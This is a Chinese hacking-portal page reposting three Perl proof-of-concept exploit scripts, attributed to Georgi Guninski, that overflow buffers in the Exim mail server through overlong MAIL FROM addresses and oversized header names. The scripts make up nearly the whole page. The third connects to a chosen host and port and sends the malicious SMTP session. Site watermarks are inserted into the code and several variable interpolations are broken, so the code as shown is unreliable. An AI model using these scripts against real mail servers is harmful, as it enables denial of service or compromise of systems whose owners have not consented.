中国网管联盟

搜索

热门标签

发表文章 返回首页
当前位置: bitsCN.com > 网络攻防 > 黑客技术 > Exploit >

Exim Buffer Overflows (sender_verify, headers_check_synt

时间:2004-05-12 20:34来源:中国网管联盟 作者:BitsCN整理 点击:
----exi1.pl---------------------------------- #!/usr/bin/perl # works if sender_verify = true is in exim.conf # written by georgi guninski # cannot be used in vulnerability databases or CVE print HELO a\r\n; my $ch=getc(); print MAIL FROM: . v x 300
   ----exi1.pl----------------------------------
#!/usr/bin/perl
# works if sender_verify = true is in exim.conf
# written by georgi guninski
# cannot be used in vulnerability databases or CVE
print "HELO a\r\n";
my $ch=getc();
print "MAIL FROM: " . "v" x 300 ."\@vt" . "\r\n";
print "RCPT TO: BillGay\@localhost\r\n";
print "DATA\r\n";
#print "From" . " " x 65 . ":" . "ff fff ff" ."\r\n";
print "asdasd\r\n";
print "\r\n";
print ".\r\n";
print "QUIT\r\n";
---------------------------------------------

----exi2.pl----------------------------------
#!/usr/bin/perl
# works if headers_check_syntax is in exim.conf
# written by georgi guninski
# cannot be used in vulnerability databases

print "HELO a\r\nMAIL FROM: BillGay\@localhost\r\nRCPT TO: SteveNoBall\@localhost\r\n";
网管联盟www.bitsCN.com

print "DATA\r\n";
my $ch=getc();
print "From" . " " x 275 . ":" ."vv v \r\n";
print "asdasd\r\n";
print "\r\n";
print ".\r\n";
print "QUIT\r\n";
---------------------------------------------


----exi3.pl----------------------------------
#!/usr/bin/perl

use IO::Socket;

my $port = $ARGV[1];
my $host = $ARGV[0];

# written by georgi guninski
# cannot be used in vulnerability databases
print "Written by georgi guninski\nCannot be used in vulnerability databases or CVE\n";

my $repl;
my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || die "socket";

$repl= <$socket>;
print "server replied $";
my $req= "HELO a\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied $"; 网管网bitsCN.com


my $fromaddr="BillGay\@soft";
my $touser="SteveNoBall\@soft";

$req = "MAIL FROM: $\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied $";

$req = "RCPT TO: $\r\n";
syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied $";
$req = "DATA\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied $";

print "Attached with debugger to exim and press enter\n";
my $ccc=getc();

$req = "From" . " " x 200 . ":" ." root\r\n";

$req .= "just to let you know that you sux\r\n";
$req .= ".\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied $";



while(<$socket>)
{
print $_; 中国网管论坛bbs.bitsCN.com
}


close $socket;

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
最新评论 查看所有评论
发表评论 查看所有评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 密码: 验证码:
发布者资料
admin 查看详细资料 发送留言 加为好友 用户等级:注册会员 注册时间:2008-05-08 23:05 最后登录:2009-01-05 00:01
推荐内容
热点内容

Copyright ©1999-2008 中国网管联盟/网管网 版权所有. 网管必上的网站 沪ICP证05002360号